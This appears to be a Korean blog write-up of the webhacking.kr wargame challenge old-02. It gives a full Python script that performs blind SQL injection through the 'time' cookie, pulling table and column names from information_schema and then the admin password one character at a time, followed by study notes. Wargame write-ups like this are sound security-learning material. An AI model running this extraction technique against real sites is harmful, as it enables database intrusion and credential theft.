[ webhacking.kr ] 2번 old

sangjun

·

2022. 2. 2. 13:25

반응형

문제 소스


<!--
2022-02-02 01:35:05
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->

 

문제 풀이

- 주석에 admin.php에 들어가보라고 힌트를 준다.

- sql injection이 안 먹히는것 같으니 admin의 pw를 알아내야 하는것 같다.

- 느낌상 bsqli같다 

- 입력 벡터는 PHPSESSION과 time 쿠키뿐이다.

- PHPSESSION을 바꾸게 되면 로그아웃 되니 time값에 sql injection을 넣어보겠다.

- True일 때는 1초로 되고 False일 때는 0초로 된다.

1을 넣었을 때 1초가 된다
1=0을 넣었을 때는 0

import requests
import string
from pwn import *
url="https://webhacking.kr/challenge/web-02/"
tc=string.ascii_letters+string.digits+string.punctuation
cookie={
        "PHPSESSID":"vinncgg3oi5pqsp06fu33k5ppp"
}


def leak_DB_CNT():
    query="(select count(table_name) from information_schema.tables where table_schema=database())"
    cookie['time']=query
    response=requests.get(url,cookies=cookie)
    return response.text
def leak_DB_length():
    query="(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)"
    cookie['time']=query
    response=requests.get(url,cookies=cookie)
    return response.text

def leak_DB_name():

    result=""
    for idx in range(1,13+1):
        query=f"(select ascii(substring(table_name,{idx},1)) from information_schema.tables where table_schema=database() limit 0,1)"
        cookie['time']=query
        response=requests.get(url, cookies=cookie)

        parse=response.text[response.text.find("2070-01-01 09:")+14:response.text.find("2070-01-01 09:")+19]

        repl=parse.replace(":"," ")
        a=int(repl[:repl.find(" ")])*60
        b=int(repl[repl.find(" ")+1:])

        result+=chr(a+b)
    return result
def leak_column_cnt(db_name):
    query=f"(select count(column_name) from information_schema.columns where table_name='{db_name}')"
    cookie['time']=query
    log.critical(f"query = {query}")
    response=requests.get(url,cookies=cookie)
    return response.text
def leak_column_length(db_name):
    query=f"(select length(column_name) from information_schema.columns where table_name='{db_name}')"
    log.info(f"payload= {query}")
    cookie['time']=query
    response=requests.get(url,cookies=cookie)
    return response.text
def leak_column_name(db_name):
    result=""
    for i in range(1,2+1):
        query1=f"(select ascii(substring(column_name,{i},1)) from information_schema.columns where table_name='{db_name}')"
        cookie['time']=query1
        response=requests.get(url,cookies=cookie)
        parse=response.text[response.text.find("2070-01-01 09:")+14:response.text.find("2070-01-01 09:")+19]
        repl=parse.replace(":"," ")
        a=int(repl[:repl.find(" ")])*60
        b=int(repl[repl.find(" ")+1:])
        result+=chr(a+b)
    return result
def leak_pw_length():
    query=f"(select length(pw) from admin_area_pw)"
    log.info(f"payload= {query}")
    cookie['time']=query
    response=requests.get(url,cookies=cookie)
    print(response.text)
def leak_pw():
    result=""
    for i in range(1,18):
        query1=f"(select ascii(substring(pw,{i},1)) from admin_area_pw)"
        cookie['time']=query1
        response=requests.get(url,cookies=cookie)
        parse=response.text[response.text.find("2070-01-01 09:")+14:response.text.find("2070-01-01 09:")+19]
        repl=parse.replace(":"," ")
        a=int(repl[:repl.find(" ")])*60
        b=int(repl[repl.find(" ")+1:])
        result+=chr(a+b)
    return result

log.critical("[+]leak DB CNT\n"+leak_DB_CNT())
log.critical("[+]leak DB Length\n "+leak_DB_length())
db_Name=leak_DB_name()
log.critical("[+]leak DB NAME\n"+db_Name)
log.critical("[+] leak colum cnt\n"+leak_column_cnt(db_Name))
log.critical("[+] leak colum length\n"+leak_column_length(db_Name))
log.critical("[+] leak colum name\n"+leak_column_name(db_Name))
leak_pw_length()
print(leak_pw())

기억해야할 점
1. 입력 벡터 찾기
2. 주석이 없다면 딕셔너리 공격한번 해보기
3. sql injection이 나왔을 때 DB이름 Table네임 어떻게 구할지 생각해보기
4. information_schema.XXX 변수 기억하기
5. 4번의 XXX가 where절로 오면 s가 빠진다.
6. database()함수 기억해두기

반응형

'War Games > webhacking.kr' 카테고리의 다른 글

[ webhacking.kr ] 1번 old  (0) 2022.02.02
[ webhacking.kr ] 50번 old  (6) 2022.01.26
[ webhacking.kr ] 51번 old  (0) 2022.01.26
[ webhacking.kr ] 52번 old  (0) 2022.01.26
[ webhacking.kr ] 53번 old  (0) 2022.01.26

0개의 댓글